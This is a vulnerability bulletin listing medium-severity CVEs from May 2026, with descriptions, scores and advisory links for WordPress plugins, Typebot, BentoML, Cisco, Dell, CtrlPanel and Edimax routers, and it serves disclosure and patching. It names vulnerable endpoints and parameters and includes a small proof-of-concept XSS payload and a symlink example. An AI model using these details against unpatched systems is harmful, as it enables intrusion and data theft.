askywhale–Games Catalog The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 4.3 CVE-2026-8418 https://www.wordfence.com/threat-intel/vulnerabilities/id/0888cda8-63ca-44f6-a3eb-765c14a7e6c7?source=cve
https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L94
https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L94
https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L31
https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L31
https://plugins.trac.wordpress.org/browser/game-catalog/trunk/games-catalog.php#L96
https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/games-catalog.php#L96
 
baptisteArno–typebot.io Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the getResultLogs API endpoint authorizes the caller against the provided typebotId but fetches logs solely by resultId without verifying that the result belongs to the authorized typebot, leading to IDOR. An authenticated attacker can supply their own typebotId alongside any victim’s resultId to read execution logs from other workspaces, leaking sensitive data including HTTP response bodies, AI model outputs, and webhook payloads. Every other result-scoped endpoint in the same router properly validates that the resultId belongs to the authorized typebotId. This confirms the missing check is an oversight, not a design choice. This issue has been fixed in version 3.15.2. 2026-05-22 6.5 CVE-2026-28444 https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-c63p-mqx5-75r7
https://github.com/baptisteArno/typebot.io/commit/d82b2d47c86ae614a08d4073c669ca64442faff2
https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0
 
baptisteArno–typebot.io TypeBot is a chatbot builder tool. In version 3.15.2, the getLinkedTypebots API endpoint returns full bot definitions to any authenticated user who references a target bot ID in a Typebot Link block, regardless of workspace ownership, leading to IDOR. The authorization check uses Array.filter() with an async callback – since filter() is synchronous, the callback always returns a truthy Promise, so the access control predicate is never actually evaluated. Any authenticated Typebot user can read the full definition of any other workspace’s private bots, including: all conversation blocks and logic flow, variable values embedded in the bot (credentials, API keys, PII), webhook URLs and integration configurations. This issue has been fixed in version 3.16.0. 2026-05-22 6.5 CVE-2026-39966 https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-3fr5-999r-84qj
https://github.com/baptisteArno/typebot.io/commit/b9530a089b43bfa6e79e3ff9cbfab921ce832f45
https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0
 
baptisteArno–typebot.io TypeBot is a chatbot builder tool. In versions 3.16.0 and prior, the WhatsApp Cloud API webhook endpoint (POST /v1/workspaces/{workspaceId}/whatsapp/{credentialsId}/webhook) does not verify the x-hub-signature-256 HMAC signature included by Meta in every webhook delivery. The webhook URL exposes both workspaceId and credentialsId as path parameters, which are logged in web server access logs, visible in Meta’s webhook configuration dashboard, and potentially shared when configuring integrations. This allows any unauthenticated attacker to send spoofed webhook messages to trigger bot flows, consume API resources, and interact with external services using the workspace owner’s credentials. The issue has been fixed in version 3.17.0. 2026-05-22 6.5 CVE-2026-39969 https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8vqp-r5w7-v47f
https://github.com/baptisteArno/typebot.io/releases/tag/v3.17.0
 
baptisteArno–typebot.io TypeBot is a chatbot builder tool. In versions prior to 3.16.0, the Typebot viewer (packages/embeds/js) renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor’s browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker’s JavaScript runs in the host page’s origin and can exfiltrate cookies and session tokens. This can result in any authenticated Typebot user (including those on the free tier) being able to create a bot with this payload. Shared bots are publicly accessible – no victim authentication is required. This issue has been resolved in version 3.16.0. 2026-05-22 5.4 CVE-2026-39964 https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-hqmv-v56g-4m47
https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b
https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0
 
Behance–Smartshop Smartshop 1 contains a cross-site request forgery vulnerability that allows attackers to modify user profiles by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting editprofile.php with hidden fields for email and password parameters that execute automatically when visited by an authenticated admin user. 2026-05-23 4.3 CVE-2018-25343 ExploitDB-44824
Official Product Homepage
Product Reference
VulnCheck Advisory: Smartshop 1 Cross-Site Request Forgery via editprofile.php
 
bentoml–BentoML BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.38 and prior, the build packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as loot.txt -> /tmp/outside-marker.txt or a link to a more sensitive local file. When bentoml build runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows. An attacker can exfiltrate local files from the build host into the Bento artifact, exposing secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configurations. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine. This issue has been fixed in version 1.4.39. 2026-05-22 5.5 CVE-2026-40610 https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv
https://github.com/bentoml/BentoML/commit/5fb7cd41f92e2a56b45391284cf15b9ac9963a1f
https://github.com/bentoml/BentoML/releases/tag/v1.4.39
 
bestpractical–rt RT is an open source, enterprise-grade issue and ticket tracking system. Versions prior to 5.0.10 and 6.0.0 through 6.0.2 contain a spreadsheet (CSV/formula) injection vulnerability. User-controlled data in spreadsheet exports is not sanitized before being written to the output file, which can cause spreadsheet applications to interpret crafted values as formulas or macros when the file is opened. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by avoiding opening exported RT spreadsheet files directly in spreadsheet applications when the data may contain untrusted user input. 2026-05-22 4.6 CVE-2026-41073 https://github.com/bestpractical/rt/security/advisories/GHSA-6x92-7v65-7m3r
https://github.com/bestpractical/rt/releases/tag/rt-5.0.10
https://github.com/bestpractical/rt/releases/tag/rt-6.0.3
 
bigbluebutton–bigbluebutton BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.19, the recording playback (presentation format) was not sanitizing user’s input in public chat. This allowed a malicious actor to craft and carry out a targeted XSS attack, activated on anyone replaying the recording. This issue has been fixed in 3.0.19. 2026-05-18 6.5 CVE-2026-27737 https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-8vv7-vj94-q2pv
https://github.com/bigbluebutton/bbb-playback/commit/09e89bfe4ff8488b68c3ff040d3081e419dc89b1
https://github.com/bigbluebutton/bigbluebutton/commit/69f45aa1b963dc7d80179d0155acc670aec5c4fc
https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.19
https://github.com/blindsidenetworks/scalelite/releases/tag/v1.7.0
 
Brainstorm Force–Presto Player Missing Authorization vulnerability in Brainstorm Force Presto Player allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Presto Player: from n/a through 4.1.3. 2026-05-19 4.3 CVE-2026-45442 https://patchstack.com/database/wordpress/plugin/presto-player/vulnerability/wordpress-presto-player-plugin-4-1-3-broken-access-control-vulnerability?_s_id=cve
 
broadstreetads–Broadstreet The Broadstreet plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.52.2 via the get_sponsored_meta AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disclose any private post metadata. 2026-05-21 4.3 CVE-2026-1881 https://www.wordfence.com/threat-intel/vulnerabilities/id/328ccf8f-797b-4b1a-b0f1-afd8e44f41e6?source=cve
https://plugins.trac.wordpress.org/changeset?old_path=%2Fbroadstreet/tags/1.52.2&new_path=%2Fbroadstreet/tags/1.53.2
 
burlingtonbytes–WP Blockade Visual Page Builder The WP Blockade plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘shortcode’ parameter in all versions up to and including 0.9.14. This is due to insufficient input sanitization and output escaping in the render_shortcode_preview() function. The function receives user input from $_GET[‘shortcode’], passes it through stripslashes() without any sanitization, and then outputs it directly via echo do_shortcode($shortcode) on line 393. When the input is not a valid WordPress shortcode (e.g., an HTML tag with JavaScript event handlers), do_shortcode() returns it unchanged, and it is reflected into the page without escaping. The endpoint is registered via admin_post_ (not admin_post_nopriv_), meaning it requires the user to be logged in with at minimum a Subscriber-level account. There is no nonce verification or additional capability check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute if they can successfully trick a user into performing an action such as clicking a link. 2026-05-22 6.1 CVE-2026-3481 https://www.wordfence.com/threat-intel/vulnerabilities/id/66950509-ce2a-42fe-a8b2-2a92a1b573c3?source=cve
https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393
https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393
https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L360
https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L360
 
calcom–cal.diy A security flaw has been discovered in calcom cal.diy up to 4.9.4. The affected element is the function validateUrlForSSRF of the file apps/web/app/api/logo/route.ts of the component Logo API. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 5 CVE-2026-9304 VDB-365251 | calcom cal.diy Logo API route.ts validateUrlForSSRF server-side request forgery
VDB-365251 | CTI Indicators (IOB, IOC, IOA)
Submit #812176 | cal.com <= v4.9.4 Server-Side Request Forgery (CWE-918)
https://gist.github.com/YLChen-007/b3d0b85767b7e346a291933d602fbb3b
 
calcom–cal.diy A vulnerability was determined in calcom cal.diy up to 4.9.4. Affected by this issue is the function getServerSideProps of the file apps/web/modules/bookings/views/bookings-single-view.getServerSideProps.tsx of the component Generic React API. This manipulation of the argument cancelledBy/rescheduledBy causes information disclosure. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 5.3 CVE-2026-9349 VDB-365312 | calcom cal.diy Generic React API bookings-single-view.getServerSideProps.tsx getServerSideProps information disclosure
VDB-365312 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #812177 | cal.com <= v4.9.4 Exposure of Sensitive Information (CWE-200)
https://gist.github.com/YLChen-007/b59c44d1550c4b0f373ca4eb1c150994
 
calcom–cal.diy A vulnerability was identified in calcom cal.diy up to 4.9.4. Impacted is an unknown function. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 4.3 CVE-2026-9303 VDB-365250 | calcom cal.diy cross-site request forgery
VDB-365250 | CTI Indicators (IOB, IOC)
Submit #812173 | cal.com <= v4.9.4 Cross-Site Request Forgery (CWE-352)
Submit #812175 | cal.com <= v4.9.4 Cross-Site Request Forgery (CWE-352) (Duplicate)
https://gist.github.com/YLChen-007/26663d9558e15994176dc420d2e11d48
https://gist.github.com/YLChen-007/dafada36e356bc895b09829d8ec57e49
 
Cisco–Cisco NX-OS Software A vulnerability in the Border Gateway Protocol (BGP) enforce-first-as feature of Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to trigger BGP peer flaps, resulting in a denial of service (DoS) condition. This vulnerability is due to incorrect parsing of a transitive BGP attribute. An attacker could exploit this vulnerability by sending a crafted BGP update through an established BGP peer session. If the update propagates to an affected device, it could cause the device to drop the BGP session and flap with the BGP peer that is forwarding this update, resulting in a DoS condition. 2026-05-20 6.8 CVE-2026-20171 cisco-sa-bgp-iefab-3hb2pwtx
 
Cisco–Cisco ThousandEyes Enterprise Agent A vulnerability in the BrowserBot component of Cisco ThousandEyes Enterprise Agent could have allowed an authenticated, remote attacker to execute arbitrary commands on Agents on behalf of the BrowserBot synthetics orchestration process. Cisco has addressed this vulnerability in the Cisco ThousandEyes Enterprise Agent, and no customer action is needed. This vulnerability was due to insufficient input validation of command arguments that are supplied by the user. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by authenticating to the ThousandEyes SaaS and submitting crafted input into the affected parameter. A successful exploit could have allowed the attacker to execute arbitrary commands within the BrowserBot container as the node user. To exploit this vulnerability, the attacker must have valid user credentials for the ThousandEyes SaaS and the ability to manage transaction tests. 2026-05-20 6.3 CVE-2026-20206 cisco-sa-tebbot-cmdinj-wN3yQ5gn
 
Cisco–Cisco ThousandEyes Enterprise Agent A vulnerability in the SSL certificate handling of Cisco ThousandEyes Virtual Appliance could allow an authenticated, remote attacker to execute commands on the underlying operating system as the root user. This vulnerability is due to insufficient validation of user-supplied input. An authenticated attacker could exploit this vulnerability by uploading a crafted certificate to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit this vulnerability, the attacker must have valid administrative credentials. 2026-05-20 4.7 CVE-2026-20199 cisco-sa-tevacert-rce-RMJVEym5
 
conoha–TypeSquare Webfonts for ConoHa The TypeSquare Webfonts for ConoHa plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin’s site-wide font settings, including the typesquare_auth option (fontThemeUseType), show_post_form, and typesquare_fonttheme, by submitting a POST request to any wp-admin page. For fontThemeUseType values 1 and 3, no nonce verification is performed either, meaning those branches are additionally exploitable via cross-site request forgery. 2026-05-20 4.3 CVE-2026-8610 https://www.wordfence.com/threat-intel/vulnerabilities/id/88002a25-6890-4f8b-8a11-239b59d56672?source=cve
https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L93
https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/inc/class/class.auth.php#L51
https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L25
 
cryptpad–cryptpad CryptPad is an end-to-end encrypted collaborative office suite. In versions prior to 2026.2.0, the HTML sanitizer in Diffmarked.js can be bypassed due to incomplete attribute filtering on restricted tags. The sanitizer validates only the src attribute of <iframe>, <video>, and <audio> elements, leaving all other attributes unchecked. As a result, an attacker can inject arbitrary HTML through srcdoc, completely defeating CryptPad’s intended bounce sandboxing and enabling link injection or other interactive content within user-controlled documents. The root cause lies in how the sanitizer classifies and enforces tag restrictions: although it defines both forbidden and restricted tag lists, <iframe> is treated as “restricted” rather than “forbidden.” Enforcement then inspects only the src attribute, so pairing a benign blob: src with a malicious srcdoc results in unrestricted rendering. This issue has been fixed in version 2026.2.0. 2026-05-20 6.1 CVE-2026-26028 https://github.com/cryptpad/cryptpad/security/advisories/GHSA-g2g4-47gv-p72v
https://github.com/cryptpad/cryptpad/releases/tag/2026.2.0
 
Ctrlpanel-gg–panel CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the admin settings update endpoint accepted a fully qualified class name directly from user-supplied request input and used it for dynamic static method calls and object instantiation without any allowlist validation, allowing for authenticated Remote Code Execution. An authenticated admin-level user could supply an arbitrary class name available in the Composer autoloader, potentially triggering unintended constructor or magic method execution. The update() method reads settings_class directly from the HTTP request and passed it to new $settings_class() and $settings_class::getValidations() without verifying that the provided value corresponds to a legitimate settings class: Because PHP resolves class names against the Composer autoloader at runtime, any autoloadable class in the application or its dependencies could be instantiated. Depending on the classes available in the dependency tree, this can trigger unintended side effects through constructors or magic methods (__construct, __toString, __wakeup), following a PHP object injection / gadget chain pattern. This issue has been fixed in version 1.2.0. 2026-05-19 6.6 CVE-2026-34216 https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-vcg3-fjrx-rg5q
https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0
 
Ctrlpanel-gg–panel CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multiple admin controllers expose DataTable endpoints without authorization checks, allowing any authenticated user to access sensitive administrative data that should be restricted to administrators only. The affected admin controllers define datatable() methods that are reachable via GET requests but lack any permission or role verification. Because the routes fall under the /admin/ prefix, operators may assume they are protected – however, the middleware applied to this route group does not enforce admin-level authorization on these specific endpoints. As a result, any authenticated user (regardless of role) can query these endpoints and receive paginated JSON responses containing sensitive records. Exploitation can result in enumeration of user PII, payment and transaction records, active voucher and coupon codes, role and permission structure, server ownership mappings and support ticket contents. This issue has been fixed in version 1.2.0. 2026-05-19 6.5 CVE-2026-34233 https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-mj5g-j7fq-7hc4
https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0
 
Ctrlpanel-gg–panel CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the admin role management interface. In app/Http/Controllers/Admin/RoleController.php, the datatable() method interpolates $role->name and $role->color directly into a <span> element’s HTML and style attribute without sanitization, and the chained .rawColumns([‘actions’, ‘name’]) call instructs DataTables to render the name column as raw HTML, bypassing automatic output escaping. An admin with role creation or edit permissions can inject a payload such as <img src=x onerror=”alert(‘XSS_POC’)”> into the name or color fields, which is persisted to the database and executes in the browser of every admin who loads the /admin/roles page. This enables session hijacking via cookie theft, credential harvesting through fake login prompts or keyloggers, lateral privilege escalation by performing admin actions on behalf of victims, and a persistent backdoor that re-executes on every page load until the malicious role record is removed. This issue has been resolved in version 1.2.0. 2026-05-19 4.8 CVE-2026-34246 https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-wpqj-xwhq-2mmh
https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0
 
cvmh–Sticky The Sticky plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `cvmh-sticky` shortcode `readmoretext` attribute in versions up to and including 2.5.6. This is due to insufficient input sanitization and output escaping in the `cvmh_sticky_front_render()` function – the `readmoretext` attribute value is passed through `apply_filters()` and directly concatenated into the HTML output without any escaping function such as `esc_html()`. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a page containing the injected shortcode. 2026-05-20 6.4 CVE-2026-6397 https://www.wordfence.com/threat-intel/vulnerabilities/id/135783c5-8175-4775-a013-f1e2bef04479?source=cve
https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/functions.php#L118
https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/functions.php#L118
https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/shortcode.php#L7
https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/shortcode.php#L7
 
dartiss–Draft List The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Draft Post Title in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The unescaped injection path is triggered specifically when the viewing user lacks edit capabilities, meaning payloads embedded in draft post titles via attribute-breakout techniques execute for unauthenticated users and subscribers. 2026-05-22 6.4 CVE-2026-9104 https://www.wordfence.com/threat-intel/vulnerabilities/id/07361278-7abb-4d22-a8df-218d3f982483?source=cve
https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L396
https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L305
https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L66
https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L389
https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L391
https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L394
 
Dell–ECS Dell ECS, versions 3.5 and 3.6, contain an Improper Access Control vulnerability in the Identity and Access Management (IAM) module. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to read access to unauthorized data. 2026-05-22 5.9 CVE-2022-31231 https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P0000004RFTQA2/view
 
Dell–Live Optics Dell Live Optics Windows and Personal Edition collectors contain an improper certificate validation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability leading to loss of confidentiality and integrity. 2026-05-18 6.8 CVE-2026-41119 https://www.dell.com/support/kbdoc/en-us/000464862/dsa-2026-221-security-update-for-dell-live-optics-collector-ssl-vulnerability
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, versions 4.6.2 and prior, contains an Open Redirect Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability, leading to a targeted application user being redirected to arbitrary web URLs. The vulnerability could be leveraged by attackers to conduct phishing attacks that cause users to divulge sensitive information. 2026-05-22 6.1 CVE-2025-26483 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, versions 4.6.2 and prior, contain an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges. 2026-05-22 5.3 CVE-2025-32747 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, versions 4.6.2 and prior, contain an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information exposure. 2026-05-22 5.3 CVE-2025-32749 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, versions 4.6.2 and prior, contain an Insecure Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. 2026-05-22 5.5 CVE-2025-32751 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, versions 4.6.2 and prior, contain an Improper Certificate Validation vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to information tampering. 2026-05-22 4.2 CVE-2025-32745 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, versions 4.6.2 and prior, contain an Insecure Storage of Sensitive Information vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. 2026-05-22 4 CVE-2025-32746 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
Dell–SmartFabric Storage Software Dell SmartFabric Storage Software, versions prior to 1.4.5, contains an Improper Neutralization of Special Elements used in a Command (‘Command Injection’) vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to filesystem access for the attacker. 2026-05-20 6.4 CVE-2026-35070 https://www.dell.com/support/kbdoc/en-us/000466942/dsa-2026-235-security-update-for-dell-networking-smartfabric-storage-software-vulnerabilities
 
Dell–Unisphere for PowerMax Dell Unisphere for PowerMax vApp, versions prior to 10.0.0.2, contains an authorization bypass vulnerability in the Unisphere for VMAX application running in the vApp. 2026-05-22 6.5 CVE-2022-34363 https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P000000xAiKQAU/view
 
Dell–VxRail Dell VxRail versions before 7.0.200 contain a Plain-text Password Storage Vulnerability in VxRail Manager. A sys-admin user may exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. 2026-05-22 6.7 CVE-2021-21508 https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka0Do000000m7VwIAI/view
 
discourse–discourse Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, outdated cached AI summaries can leak removed content to anonymous and unprivileged users who cannot regenerate summaries. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. To work around this issue, restrict summary generation by tightening the allowed groups on the summarization Personas. 2026-05-19 5.3 CVE-2026-32244 https://github.com/discourse/discourse/security/advisories/GHSA-hjmg-2mww-vfvx
 
DumbWareio–DumbAssets DumbAssets through 1.0.11 contains a stored cross-site scripting vulnerability in asset fields including name, description, modelNumber, serialNumber, and tags that are stored without server-side sanitization and rendered using innerHTML without client-side escaping. Attackers can create or update assets with HTML or JavaScript payloads via the asset API endpoints to execute arbitrary scripts in the browsers of users viewing the asset list, and with Content-Security-Policy disabled, the injected scripts can make unrestricted connections to internal network services. 2026-05-18 6.1 CVE-2026-45231 https://github.com/DumbWareio/DumbAssets/pull/135
https://www.vulncheck.com/advisories/dumbassets-stored-cross-site-scripting-via-asset-fields
 
eazyserver–Sentence To SEO (keywords, description and tags) The Sentence To SEO (keywords, description and tags) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the create_admin_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 6.1 CVE-2026-6391 https://www.wordfence.com/threat-intel/vulnerabilities/id/add32c06-90d0-466f-b176-aaae55cf03fb?source=cve
https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L75
https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L75
https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L81
https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L81
https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L87
https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L87
https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L50
https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L50
 
Edimax–BR-6228NC A vulnerability was detected in Edimax BR-6228NC 1.22. Affected by this issue is the function mp of the file /goform/mp of the component POST Request Handler. The manipulation of the argument command results in command injection. The attack may be performed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-18 6.3 CVE-2026-8774 VDB-364399 | Edimax BR-6228NC POST Request mp command injection
VDB-364399 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811529 | EDIMAX BR6228NC BR-6228NCv2 (Version : v1.22) Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR6228NC-mp-34b53a41781f80db8aaed24e43ea24b9?source=copy_link
 
Edimax–BR-6428NS A vulnerability was found in Edimax BR-6428NS 1.10. This issue affects the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component POST Request Handler. Performing a manipulation of the argument stadrv_ssid results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-18 6.3 CVE-2026-8777 VDB-364402 | Edimax BR-6428NS POST Request formStaDrvSetup command injection
VDB-364402 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811532 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formStaDrvSetup-34b53a41781f80ca940cc467cd15dfc2?source=copy_link
 
